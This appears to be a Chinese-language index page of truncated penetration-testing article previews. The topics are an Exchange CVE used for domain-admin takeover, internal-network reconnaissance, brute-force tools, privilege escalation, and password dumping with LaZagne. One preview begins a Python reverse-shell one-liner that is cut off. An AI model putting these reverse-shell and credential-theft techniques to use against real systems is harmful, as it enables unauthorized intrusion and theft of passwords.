关于利用Exchange攻击域管理员权限的一些建议

Microsoft Exchange 2013及之后版本存在一个漏洞(CVE-2018-8581),利用该漏洞可以接管域内任何人的邮箱,甚至获取域管权限。 如何…

内网渗透简单思路

进了内网就是做密码收集 0x01:信息收集: 1、通过命令可以批量跑192.168..1/172.16..1/10…*.1每个c段只跑第一台机器,对整个内网…

win下常用爆破工具+字典

在渗透测试过程中,暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个…

内网简单反弹

linux目标机器: python -c ‘import socket,subprocess,os;s=socket.socket(socket.A…

提权总结

提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限 提权小结: windows serv…

抓取各种密码总结

0x01:cmd下抓取浏览器密码 https://github.com/AlessandroZ/LaZagne 工具下载 优点:无弹窗,可在cmd下直接执行 0…